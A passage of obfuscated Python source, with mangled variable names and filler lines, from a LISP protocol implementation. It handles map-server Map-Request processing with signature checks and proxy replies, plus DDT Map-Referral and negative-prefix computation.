IiI1iiiI1I1 = bold ( "Map-Notify" , False )
xtr_id = "0x" + lisp_hex_string ( xtr_id )
lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( IiI1iiiI1I1 ,
ooOOoo0 , I11iiII1I1111 , xtr_id ) )
if 3 - 3: I1Ii111 . i1IIi
if 3 - 3: O0 + i1IIi - OOooOOo / I1Ii111
if 13 - 13: oO0o + Oo0Ooo + Oo0Ooo / OoO0O00 + i1IIi + I1IiiI
if 56 - 56: OoOoOO00
packet = lisp_convert_reply_to_notify ( packet )
lisp_send_map_notify ( lisp_sockets , packet , itr_rloc , port )
return
if 10 - 10: iIii1I11I1II1 + i1IIi * Ii1I / iIii1I11I1II1 % OoOoOO00 / O0
if 14 - 14: O0
if 65 - 65: IiII / oO0o
if 57 - 57: IiII + oO0o - IiII
if 51 - 51: OoOoOO00 % IiII / iII111i - oO0o - OoO0O00 . iIii1I11I1II1
if 61 - 61: OoO0O00
if 60 - 60: I1IiiI % O0 % OoooooooOO / Ii1I
if 9 - 9: OoooooooOO / I11i % I11i * O0 / II111iiii . II111iiii
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
mr_sport , ecm_source ) :
if 40 - 40: II111iiii + OoooooooOO / iII111i % O0 + OOooOOo . ooOoO0o
if 71 - 71: OoooooooOO + ooOoO0o * o0oOOo0O0Ooo + I1IiiI
if 47 - 47: oO0o
if 91 - 91: I1IiiI * O0 + OoooooooOO * i1IIi % I1ii11iIi11i . IiII
if 67 - 67: I1IiiI * I11i
if 43 - 43: IiII * Oo0Ooo / OoOoOO00 + I1IiiI - i11iIiiIii + II111iiii
ooOOoo0 = map_request . target_eid
IIi1iiIII11 = map_request . target_group
I11i11i1 = lisp_print_eid_tuple ( ooOOoo0 , IIi1iiIII11 )
o00O00oOO00 = map_request . itr_rlocs [ 0 ]
I1II = map_request . xtr_id
Iii11I = map_request . nonce
I11I1iI = LISP_NO_ACTION
Ooo = map_request . subscribe_bit
if 81 - 81: I11i / Oo0Ooo % Ii1I % OoO0O00
if 87 - 87: O0 % II111iiii
if 42 - 42: I1IiiI . i1IIi
if 98 - 98: o0oOOo0O0Ooo % I11i . Oo0Ooo * Oo0Ooo % iII111i
if 37 - 37: OoO0O00 / I1Ii111 . I1Ii111 * i1IIi
III = True
iiiooO = ( lisp_get_eid_hash ( ooOOoo0 ) != None )
if ( iiiooO ) :
O0OO0OoO00oOo = map_request . map_request_signature
if ( O0OO0OoO00oOo == None ) :
III = False
lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
if 92 - 92: OoooooooOO * i1IIi - i11iIiiIii + O0
else :
Oo0o0ooOo0 = map_request . signature_eid
ii1iIIi , I1i1ii , III = lisp_lookup_public_key ( Oo0o0ooOo0 )
if ( III ) :
III = map_request . verify_map_request_sig ( I1i1ii )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( Oo0o0ooOo0 . print_address ( ) , ii1iIIi . print_address ( ) ) )
if 61 - 61: ooOoO0o . I1Ii111 % I1ii11iIi11i
if 90 - 90: iII111i . OOooOOo % OoooooooOO % O0
O0oO = bold ( "passed" , False ) if III else bold ( "failed" , False )
lprint ( "EID-crypto-hash signature verification {}" . format ( O0oO ) )
if 46 - 46: ooOoO0o . I1IiiI - ooOoO0o + Oo0Ooo
if 31 - 31: OOooOOo + ooOoO0o . i1IIi - OoO0O00
if 16 - 16: I11i + I1IiiI - Ii1I / I1ii11iIi11i + Ii1I
if ( Ooo and III == False ) :
Ooo = False
lprint ( "Suppress creating pubsub state due to signature failure" )
if 38 - 38: i1IIi * iIii1I11I1II1 * iII111i + OoOoOO00
if 64 - 64: OoO0O00 % o0oOOo0O0Ooo
if 72 - 72: O0 + OoOoOO00 % OOooOOo / oO0o / IiII
if 98 - 98: Oo0Ooo . II111iiii * I11i
if 39 - 39: IiII * o0oOOo0O0Ooo + Ii1I - I11i
if 70 - 70: oO0o * ooOoO0o / ooOoO0o - Ii1I * Ii1I % OOooOOo
if 91 - 91: OoO0O00 - OoO0O00 % O0
if 67 - 67: ooOoO0o * i1IIi
if 66 - 66: o0oOOo0O0Ooo - I1ii11iIi11i . OoOoOO00 / iII111i - Ii1I - i1IIi
if 97 - 97: oO0o % iII111i - OOooOOo . OoooooooOO
if 94 - 94: Oo0Ooo
if 10 - 10: i11iIiiIii / I1ii11iIi11i . i1IIi + i1IIi * iII111i
if 64 - 64: II111iiii % I1ii11iIi11i . OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i
if 43 - 43: OoooooooOO * I1IiiI
IIII = o00O00oOO00 if ( o00O00oOO00 . afi == ecm_source . afi ) else ecm_source
if 40 - 40: i11iIiiIii % iIii1I11I1II1 . ooOoO0o - I11i
o0o000 = lisp_site_eid_lookup ( ooOOoo0 , IIi1iiIII11 , False )
if 53 - 53: IiII / I1Ii111
if ( o0o000 == None or o0o000 . is_star_g ( ) ) :
iiiII = bold ( "Site not found" , False )
lprint ( "{} for requested EID {}" . format ( iiiII ,
green ( I11i11i1 , False ) ) )
if 90 - 90: iIii1I11I1II1 + ooOoO0o . iII111i * oO0o . OOooOOo
if 74 - 74: o0oOOo0O0Ooo * II111iiii % oO0o % OoooooooOO
if 21 - 21: OOooOOo
if 2 - 2: I11i - OOooOOo / o0oOOo0O0Ooo
lisp_send_negative_map_reply ( lisp_sockets , ooOOoo0 , IIi1iiIII11 , Iii11I , o00O00oOO00 ,
mr_sport , 15 , I1II , Ooo )
if 14 - 14: I11i + Oo0Ooo + i11iIiiIii - i1IIi . O0
return ( [ ooOOoo0 , IIi1iiIII11 , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
if 47 - 47: o0oOOo0O0Ooo / i1IIi * IiII
if 50 - 50: I11i
iIIiIIiII111 = o0o000 . print_eid_tuple ( )
i11I11iiiI1 = o0o000 . site . site_name
if 76 - 76: i11iIiiIii / oO0o / II111iiii
if 49 - 49: i1IIi * II111iiii * Oo0Ooo % oO0o / II111iiii
if 8 - 8: I1IiiI . o0oOOo0O0Ooo / OoooooooOO - II111iiii
if 93 - 93: OoOoOO00 / OoOoOO00 / OoOoOO00
if 74 - 74: ooOoO0o % Oo0Ooo - iII111i - I1IiiI
if ( iiiooO == False and o0o000 . require_signature ) :
O0OO0OoO00oOo = map_request . map_request_signature
Oo0o0ooOo0 = map_request . signature_eid
if ( O0OO0OoO00oOo == None or Oo0o0ooOo0 . is_null ( ) ) :
lprint ( "Signature required for site {}" . format ( i11I11iiiI1 ) )
III = False
else :
Oo0o0ooOo0 = map_request . signature_eid
ii1iIIi , I1i1ii , III = lisp_lookup_public_key ( Oo0o0ooOo0 )
if ( III ) :
III = map_request . verify_map_request_sig ( I1i1ii )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( Oo0o0ooOo0 . print_address ( ) , ii1iIIi . print_address ( ) ) )
if 51 - 51: i11iIiiIii % OoOoOO00
if 17 - 17: ooOoO0o - i1IIi
O0oO = bold ( "passed" , False ) if III else bold ( "failed" , False )
lprint ( "Required signature verification {}" . format ( O0oO ) )
if 73 - 73: iIii1I11I1II1 - I1Ii111 % Oo0Ooo . O0
if 16 - 16: OoO0O00 / Oo0Ooo / IiII . Oo0Ooo - OoooooooOO
if 5 - 5: OoOoOO00 . I11i
if 28 - 28: I11i % OOooOOo + Oo0Ooo / OoO0O00 % o0oOOo0O0Ooo + OoO0O00
if 20 - 20: ooOoO0o . iII111i % OOooOOo + i11iIiiIii
if 64 - 64: i1IIi . o0oOOo0O0Ooo * I1Ii111 - O0
if ( III and o0o000 . registered == False ) :
lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( i11I11iiiI1 , green ( iIIiIIiII111 , False ) , green ( I11i11i1 , False ) ) )
if 76 - 76: I1IiiI % Ii1I + OoO0O00 + I1ii11iIi11i * II111iiii + Oo0Ooo
if 3 - 3: Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
if 54 - 54: Ii1I - o0oOOo0O0Ooo + OoOoOO00 / OoooooooOO
if 61 - 61: I11i / IiII % OoooooooOO - i11iIiiIii * i1IIi % o0oOOo0O0Ooo
if ( o0o000 . accept_more_specifics == False ) :
ooOOoo0 = o0o000 . eid
IIi1iiIII11 = o0o000 . group
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
if 1 - 1: IiII . OoooooooOO + II111iiii
oOoooOOO0o0 = 1
if ( o0o000 . force_ttl != None ) :
oOoooOOO0o0 = o0o000 . force_ttl | 0x80000000
if 6 - 6: O0 * Oo0Ooo
if 20 - 20: OoooooooOO * i1IIi * IiII / OoooooooOO - Oo0Ooo / i11iIiiIii
if 28 - 28: iIii1I11I1II1 % OOooOOo * I1IiiI
if 28 - 28: O0 . OoOoOO00
if 27 - 27: I1ii11iIi11i / II111iiii + O0 % I1ii11iIi11i
lisp_send_negative_map_reply ( lisp_sockets , ooOOoo0 , IIi1iiIII11 , Iii11I , o00O00oOO00 ,
mr_sport , oOoooOOO0o0 , I1II , Ooo )
if 72 - 72: I1IiiI - i1IIi
return ( [ ooOOoo0 , IIi1iiIII11 , LISP_DDT_ACTION_MS_NOT_REG ] )
if 11 - 11: iIii1I11I1II1 . OoO0O00 * Ii1I
if 65 - 65: Oo0Ooo / OoooooooOO
if 60 - 60: II111iiii + I1IiiI % oO0o - o0oOOo0O0Ooo
if 50 - 50: iIii1I11I1II1 - i11iIiiIii / iII111i + ooOoO0o / OOooOOo
if 80 - 80: IiII / OoooooooOO
oO0ooo = False
Ii1 = ""
oO0Oooo = False
if ( o0o000 . force_nat_proxy_reply ) :
Ii1 = ", nat-forced"
oO0ooo = True
oO0Oooo = True
elif ( o0o000 . force_proxy_reply ) :
Ii1 = ", forced"
oO0Oooo = True
elif ( o0o000 . proxy_reply_requested ) :
Ii1 = ", requested"
oO0Oooo = True
elif ( map_request . pitr_bit and o0o000 . pitr_proxy_reply_drop ) :
Ii1 = ", drop-to-pitr"
I11I1iI = LISP_DROP_ACTION
elif ( o0o000 . proxy_reply_action != "" ) :
I11I1iI = o0o000 . proxy_reply_action
Ii1 = ", forced, action {}" . format ( I11I1iI )
I11I1iI = LISP_DROP_ACTION if ( I11I1iI == "drop" ) else LISP_NATIVE_FORWARD_ACTION
if 82 - 82: II111iiii
if 42 - 42: I1ii11iIi11i % i11iIiiIii . iII111i
if 60 - 60: I1Ii111 % IiII - iIii1I11I1II1
if 86 - 86: I1Ii111
if 60 - 60: I1IiiI . iII111i + O0 / iIii1I11I1II1 - I1Ii111
if 32 - 32: ooOoO0o
if 9 - 9: I1Ii111
oo0OO000OooO0 = False
IiiIIIII = None
if ( oO0Oooo and lisp_policies . has_key ( o0o000 . policy ) ) :
oo00ooOOOo0O = lisp_policies [ o0o000 . policy ]
if ( oo00ooOOOo0O . match_policy_map_request ( map_request , mr_source ) ) : IiiIIIII = oo00ooOOOo0O
if 97 - 97: i11iIiiIii / O0 . iII111i . iIii1I11I1II1
if ( IiiIIIII ) :
O0oo0000o = bold ( "matched" , False )
lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( O0oo0000o ,
oo00ooOOOo0O . policy_name , oo00ooOOOo0O . set_action ) )
else :
O0oo0000o = bold ( "no match" , False )
lprint ( "Map-Request {} for policy '{}', implied drop" . format ( O0oo0000o ,
oo00ooOOOo0O . policy_name ) )
oo0OO000OooO0 = True
if 40 - 40: OoOoOO00 / iII111i / O0 * ooOoO0o
if 58 - 58: iII111i % I11i
if 71 - 71: I1IiiI + OoO0O00 + IiII * I11i
if ( Ii1 != "" ) :
lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( I11i11i1 , False ) , i11I11iiiI1 , green ( iIIiIIiII111 , False ) ,
# i1IIi / OoOoOO00 + OOooOOo - oO0o
Ii1 ) )
if 54 - 54: OoO0O00 + I11i + Oo0Ooo . II111iiii / OOooOOo
OoO0oOOooOO = o0o000 . registered_rlocs
oOoooOOO0o0 = 1440
if ( oO0ooo ) :
if ( o0o000 . site_id != 0 ) :
i1I1I = map_request . source_eid
OoO0oOOooOO = lisp_get_private_rloc_set ( o0o000 , i1I1I , IIi1iiIII11 )
if 81 - 81: o0oOOo0O0Ooo * oO0o % ooOoO0o - i11iIiiIii + oO0o
if ( OoO0oOOooOO == o0o000 . registered_rlocs ) :
i1iI11i = ( o0o000 . group . is_null ( ) == False )
iioo00oOOO00 = lisp_get_partial_rloc_set ( OoO0oOOooOO , IIII , i1iI11i )
if ( iioo00oOOO00 != OoO0oOOooOO ) :
oOoooOOO0o0 = 15
OoO0oOOooOO = iioo00oOOO00
if 9 - 9: OOooOOo + Oo0Ooo
if 84 - 84: i11iIiiIii . Ii1I
if 86 - 86: o0oOOo0O0Ooo / oO0o * i1IIi
if 41 - 41: II111iiii . i1IIi
if 78 - 78: I1IiiI * I11i % OOooOOo + Ii1I + OoOoOO00
if 23 - 23: iII111i / Oo0Ooo % OoooooooOO * OoooooooOO . iII111i / I1ii11iIi11i
if 30 - 30: oO0o - OoOoOO00 . I1IiiI
if 17 - 17: OoOoOO00
if ( o0o000 . force_ttl != None ) :
oOoooOOO0o0 = o0o000 . force_ttl | 0x80000000
if 76 - 76: I1ii11iIi11i - ooOoO0o % OoooooooOO / Oo0Ooo % IiII / ooOoO0o
if 57 - 57: O0
if 23 - 23: OoO0O00 / II111iiii . I1ii11iIi11i . O0
if 13 - 13: I1ii11iIi11i
if 32 - 32: OOooOOo / I11i + I1Ii111 / Oo0Ooo * OoooooooOO / II111iiii
if 8 - 8: OoO0O00
if ( IiiIIIII ) :
if ( IiiIIIII . set_record_ttl ) :
oOoooOOO0o0 = IiiIIIII . set_record_ttl
lprint ( "Policy set-record-ttl to {}" . format ( oOoooOOO0o0 ) )
if 17 - 17: iIii1I11I1II1 - Oo0Ooo
if ( IiiIIIII . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
I11I1iI = LISP_POLICY_DENIED_ACTION
OoO0oOOooOO = [ ]
else :
I1IIiIIIii = IiiIIIII . set_policy_map_reply ( )
if ( I1IIiIIIii ) : OoO0oOOooOO = [ I1IIiIIIii ]
if 25 - 25: O0 + I1ii11iIi11i
if 53 - 53: OoooooooOO . Oo0Ooo
if 35 - 35: OOooOOo % i11iIiiIii % ooOoO0o . O0
if ( oo0OO000OooO0 ) :
lprint ( "Implied drop action, send negative Map-Reply" )
I11I1iI = LISP_POLICY_DENIED_ACTION
OoO0oOOooOO = [ ]
if 9 - 9: ooOoO0o + iII111i / i1IIi % Oo0Ooo - o0oOOo0O0Ooo / I1IiiI
if 42 - 42: OOooOOo + oO0o % O0 * I1ii11iIi11i + i11iIiiIii
i11 = o0o000 . echo_nonce_capable
if 16 - 16: i1IIi . I11i + OoO0O00 % Ii1I * IiII + I1IiiI
if 96 - 96: II111iiii + O0 - II111iiii
if 97 - 97: I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if ( III ) :
oOOooO0oo = o0o000 . eid
O00o = o0o000 . group
else :
oOOooO0oo = ooOOoo0
O00o = IIi1iiIII11
I11I1iI = LISP_AUTH_FAILURE_ACTION
OoO0oOOooOO = [ ]
if 66 - 66: i11iIiiIii % i11iIiiIii
if 38 - 38: iIii1I11I1II1
if 80 - 80: OoO0O00
if 72 - 72: I11i * II111iiii
if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
packet = lisp_build_map_reply ( oOOooO0oo , O00o , OoO0oOOooOO ,
Iii11I , I11I1iI , oOoooOOO0o0 , map_request , None , i11 , False )
if 33 - 33: OoooooooOO / i1IIi . Ii1I
if ( Ooo ) :
lisp_process_pubsub ( lisp_sockets , packet , oOOooO0oo , o00O00oOO00 ,
mr_sport , Iii11I , oOoooOOO0o0 , I1II )
else :
lisp_send_map_reply ( lisp_sockets , packet , o00O00oOO00 , mr_sport )
if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
return ( [ o0o000 . eid , o0o000 . group , LISP_DDT_ACTION_MS_ACK ] )
if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
if 24 - 24: O0 . I1IiiI + IiII . IiII
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
iI11i = len ( o0o000 . registered_rlocs )
if ( iI11i == 0 ) :
lprint ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" . format ( green ( I11i11i1 , False ) , i11I11iiiI1 ,
# Ii1I
green ( iIIiIIiII111 , False ) ) )
return ( [ o0o000 . eid , o0o000 . group , LISP_DDT_ACTION_MS_ACK ] )
if 31 - 31: OoOoOO00
if 72 - 72: II111iiii + i11iIiiIii * OoO0O00 / II111iiii / I11i
if 59 - 59: OOooOOo
if 9 - 9: I1IiiI + I1IiiI / I11i - OOooOOo % iIii1I11I1II1 / I1ii11iIi11i
if 40 - 40: I1Ii111 - OOooOOo * IiII + o0oOOo0O0Ooo - I1IiiI
o00oO = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 56 - 56: i11iIiiIii / I1Ii111 / II111iiii / oO0o
IIi1iiIIi1i = map_request . target_eid . hash_address ( o00oO )
IIi1iiIIi1i %= iI11i
I1i1i = o0o000 . registered_rlocs [ IIi1iiIIi1i ]
if 59 - 59: iIii1I11I1II1 / I1Ii111 * o0oOOo0O0Ooo
if ( I1i1i . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( I11i11i1 , False ) ,
# O0 - I1Ii111 . oO0o
i11I11iiiI1 , green ( iIIiIIiII111 , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( I11i11i1 , False ) ,
# iII111i - I1ii11iIi11i * Ii1I
red ( I1i1i . rloc . print_address ( ) , False ) , i11I11iiiI1 ,
green ( iIIiIIiII111 , False ) ) )
if 88 - 88: o0oOOo0O0Ooo - iII111i - ooOoO0o - I11i
if 9 - 9: I1IiiI / O0 + I11i
if 39 - 39: OoooooooOO * I1ii11iIi11i + II111iiii . I1Ii111 / II111iiii . I1ii11iIi11i
if 72 - 72: OoOoOO00
lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , I1i1i . rloc , to_etr = True )
if 21 - 21: oO0o
return ( [ o0o000 . eid , o0o000 . group , LISP_DDT_ACTION_MS_ACK ] )
if 58 - 58: OoOoOO00 + i11iIiiIii % OOooOOo - i1IIi
if 39 - 39: OoooooooOO . I1IiiI + OoOoOO00
if 65 - 65: Oo0Ooo + OoooooooOO % oO0o
if 31 - 31: Ii1I
if 88 - 88: i1IIi % OoOoOO00 % Ii1I . o0oOOo0O0Ooo / I1IiiI % OOooOOo
if 39 - 39: OOooOOo / I1IiiI / iIii1I11I1II1 + Ii1I - i11iIiiIii
if 25 - 25: iII111i . OOooOOo * I1IiiI % OoO0O00 - O0 . I1IiiI
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 92 - 92: I11i * I1Ii111 . O0 - oO0o + i1IIi % Oo0Ooo
if 39 - 39: I1Ii111 - I1IiiI
if 18 - 18: i1IIi
if 42 - 42: II111iiii - i1IIi . oO0o % OOooOOo % ooOoO0o - i11iIiiIii
ooOOoo0 = map_request . target_eid
IIi1iiIII11 = map_request . target_group
I11i11i1 = lisp_print_eid_tuple ( ooOOoo0 , IIi1iiIII11 )
Iii11I = map_request . nonce
I11I1iI = LISP_DDT_ACTION_NULL
if 23 - 23: OOooOOo + iIii1I11I1II1 - i1IIi
if 72 - 72: OOooOOo . I1IiiI * O0 + i11iIiiIii - iII111i
if 79 - 79: o0oOOo0O0Ooo + I1ii11iIi11i
if 46 - 46: I11i
if 78 - 78: IiII / II111iiii
o0OOO0 = None
if ( lisp_i_am_ms ) :
o0o000 = lisp_site_eid_lookup ( ooOOoo0 , IIi1iiIII11 , False )
if ( o0o000 == None ) : return
if 91 - 91: iIii1I11I1II1 . OoO0O00 - I1ii11iIi11i + I11i / Oo0Ooo + OoO0O00
if ( o0o000 . registered ) :
I11I1iI = LISP_DDT_ACTION_MS_ACK
oOoooOOO0o0 = 1440
else :
ooOOoo0 , IIi1iiIII11 , I11I1iI = lisp_ms_compute_neg_prefix ( ooOOoo0 , IIi1iiIII11 )
I11I1iI = LISP_DDT_ACTION_MS_NOT_REG
oOoooOOO0o0 = 1
if 35 - 35: ooOoO0o * iII111i % iII111i + OOooOOo
else :
o0OOO0 = lisp_ddt_cache_lookup ( ooOOoo0 , IIi1iiIII11 , False )
if ( o0OOO0 == None ) :
I11I1iI = LISP_DDT_ACTION_NOT_AUTH
oOoooOOO0o0 = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( I11i11i1 , False ) ) )
if 66 - 66: iII111i - ooOoO0o * I1ii11iIi11i - Ii1I / OoooooooOO
elif ( o0OOO0 . is_auth_prefix ( ) ) :
if 86 - 86: I1IiiI % iII111i + Oo0Ooo + i1IIi % o0oOOo0O0Ooo
if 85 - 85: Ii1I + I1Ii111 * I11i
if 59 - 59: Oo0Ooo
if 35 - 35: OoooooooOO + I1ii11iIi11i * OOooOOo
I11I1iI = LISP_DDT_ACTION_DELEGATION_HOLE
oOoooOOO0o0 = 15
O00Ooo0oOoOOo = o0OOO0 . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( O00Ooo0oOoOOo ,
# o0oOOo0O0Ooo . o0oOOo0O0Ooo
green ( I11i11i1 , False ) ) )
if 100 - 100: iIii1I11I1II1 . I1Ii111 * I1Ii111
if ( IIi1iiIII11 . is_null ( ) ) :
ooOOoo0 = lisp_ddt_compute_neg_prefix ( ooOOoo0 , o0OOO0 ,
lisp_ddt_cache )
else :
IIi1iiIII11 = lisp_ddt_compute_neg_prefix ( IIi1iiIII11 , o0OOO0 ,
lisp_ddt_cache )
ooOOoo0 = lisp_ddt_compute_neg_prefix ( ooOOoo0 , o0OOO0 ,
o0OOO0 . source_cache )
if 72 - 72: I1Ii111 - Ii1I . OoO0O00 - IiII
o0OOO0 = None
else :
O00Ooo0oOoOOo = o0OOO0 . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( O00Ooo0oOoOOo , green ( I11i11i1 , False ) ) )
if 43 - 43: i11iIiiIii . oO0o
oOoooOOO0o0 = 1440
if 23 - 23: ooOoO0o - OoO0O00 + oO0o . OOooOOo - I1IiiI
if 66 - 66: iII111i % iII111i
if 59 - 59: II111iiii . i1IIi % i1IIi
if 40 - 40: I1Ii111 . II111iiii * o0oOOo0O0Ooo + I11i - i1IIi
if 67 - 67: o0oOOo0O0Ooo - O0 - i1IIi . ooOoO0o . iII111i
if 43 - 43: II111iiii . o0oOOo0O0Ooo + i11iIiiIii . O0 / O0 . II111iiii
IiiiIi1iiii11 = lisp_build_map_referral ( ooOOoo0 , IIi1iiIII11 , o0OOO0 , I11I1iI , oOoooOOO0o0 , Iii11I )
Iii11I = map_request . nonce >> 32
if ( map_request . nonce != 0 and Iii11I != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , IiiiIi1iiii11 , ecm_source , port )
return
if 13 - 13: Ii1I % i11iIiiIii
if 3 - 3: ooOoO0o % OoOoOO00 * I1Ii111 - OoO0O00 / i1IIi % I1IiiI
if 50 - 50: I1ii11iIi11i + iII111i
if 64 - 64: oO0o
if 11 - 11: o0oOOo0O0Ooo
if 95 - 95: i1IIi . ooOoO0o . Oo0Ooo
if 13 - 13: OOooOOo - Oo0Ooo % O0 . I1Ii111
if 66 - 66: I1IiiI + I11i
if 58 - 58: I1ii11iIi11i
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
i1IiOoOOO0O = eid . hash_address ( entry_prefix )
iiI1I = eid . addr_length ( ) * 8
OO00O = 0
if 6 - 6: iII111i + I1ii11iIi11i + ooOoO0o
if 79 - 79: oO0o - IiII % OoooooooOO . ooOoO0o * I1IiiI
if 44 - 44: o0oOOo0O0Ooo
if 76 - 76: i11iIiiIii % OoO0O00
for OO00O in range ( iiI1I ) :
iIIiIIi = 1 << ( iiI1I - OO00O - 1 )
if ( i1IiOoOOO0O & iIIiIIi ) : break
if 33 - 33: OoooooooOO + I1ii11iIi11i + I1Ii111 + O0 % I11i
if 32 - 32: Oo0Ooo % ooOoO0o % II111iiii
if ( OO00O > neg_prefix . mask_len ) : neg_prefix . mask_len = OO00O
return
if 82 - 82: ooOoO0o - I11i / I1Ii111 - i11iIiiIii - iIii1I11I1II1
if 53 - 53: iIii1I11I1II1 % I11i . i1IIi + IiII / OoOoOO00 . II111iiii
if 43 - 43: O0 - IiII + i11iIiiIii * i1IIi - ooOoO0o % IiII
if 23 - 23: OoooooooOO % o0oOOo0O0Ooo + OoO0O00
if 25 - 25: IiII % OOooOOo + Ii1I * I1ii11iIi11i
if 25 - 25: iIii1I11I1II1 * OoOoOO00 % I1IiiI + IiII
if 34 - 34: ooOoO0o - OoooooooOO . o0oOOo0O0Ooo
if 83 - 83: II111iiii . OOooOOo
if 88 - 88: O0
if 12 - 12: Ii1I % OOooOOo % Oo0Ooo * I1Ii111
def lisp_neg_prefix_walk ( entry , parms ) :
ooOOoo0 , o000Oo0 , I111Ii1 = parms
if 19 - 19: oO0o
if ( o000Oo0 == None ) :
if ( entry . eid . instance_id != ooOOoo0 . instance_id ) :
return ( [ True , parms ] )
if 18 - 18: Ii1I / OoooooooOO % i1IIi * o0oOOo0O0Ooo
if ( entry . eid . afi != ooOOoo0 . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( o000Oo0 ) == False ) :
return ( [ True , parms ] )
if 70 - 70: IiII % i1IIi / IiII - o0oOOo0O0Ooo . Oo0Ooo / O0
if 54 - 54: o0oOOo0O0Ooo
if 53 - 53: II111iiii / IiII . i1IIi + I1Ii111 / OoO0O00 - OoooooooOO
if 67 - 67: ooOoO0o . Ii1I - Oo0Ooo * iII111i . I11i - OOooOOo
if 10 - 10: I11i
if 37 - 37: o0oOOo0O0Ooo / I1IiiI * oO0o / II111iiii
lisp_find_negative_mask_len ( ooOOoo0 , entry . eid , I111Ii1 )
return ( [ True , parms ] )
if 39 - 39: IiII - i1IIi - IiII - OoooooooOO - I1ii11iIi11i
if 66 - 66: IiII + i1IIi
if 21 - 21: IiII / i11iIiiIii / OoOoOO00
if 75 - 75: Ii1I . i1IIi / I1IiiI * iII111i . IiII / OoOoOO00
if 58 - 58: ooOoO0o + OOooOOo / ooOoO0o / i11iIiiIii
if 95 - 95: ooOoO0o
if 10 - 10: OoO0O00 % ooOoO0o * o0oOOo0O0Ooo
if 37 - 37: Ii1I . o0oOOo0O0Ooo
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 34 - 34: ooOoO0o * IiII . Ii1I + iIii1I11I1II1
if 1 - 1: i11iIiiIii + I11i
if 78 - 78: Ii1I % Oo0Ooo / OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: oO0o % I1Ii111
if ( eid . is_binary ( ) == False ) : return ( eid )
if 72 - 72: I1IiiI . i11iIiiIii . OoOoOO00 + I1IiiI - I1Ii111 + iII111i
I111Ii1 = lisp_address ( eid . afi , "" , 0 , 0 )
I111Ii1 . copy_address ( eid )
I111Ii1 . mask_len = 0
if 15 - 15: I1IiiI
O00OO = ddt_entry . print_eid_tuple ( )
o000Oo0 = ddt_entry . eid
if 75 - 75: O0 . I1Ii111 . Ii1I % Oo0Ooo - OOooOOo / i11iIiiIii
if 35 - 35: OoO0O00 . II111iiii + I1Ii111 + Ii1I - O0 + OoOoOO00
if 77 - 77: O0 % Ii1I - I1ii11iIi11i
if 17 - 17: OoooooooOO - OoooooooOO % I1Ii111 * Ii1I . OoooooooOO
if 51 - 51: iIii1I11I1II1 % IiII * iIii1I11I1II1 - OoO0O00 % I1IiiI + i11iIiiIii
eid , o000Oo0 , I111Ii1 = cache . walk_cache ( lisp_neg_prefix_walk ,
( eid , o000Oo0 , I111Ii1 ) )
if 33 - 33: I11i
if 99 - 99: I11i
if 61 - 61: i1IIi - i1IIi
if 97 - 97: I11i + II111iiii / OoooooooOO + I1ii11iIi11i * o0oOOo0O0Ooo
I111Ii1 . mask_address ( I111Ii1 . mask_len )
if 29 - 29: I1Ii111
lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# iII111i * Oo0Ooo + I1ii11iIi11i / OoooooooOO - Ii1I % I11i
O00OO , I111Ii1 . print_prefix ( ) ) )
return ( I111Ii1 )
if 2 - 2: OoO0O00 . II111iiii
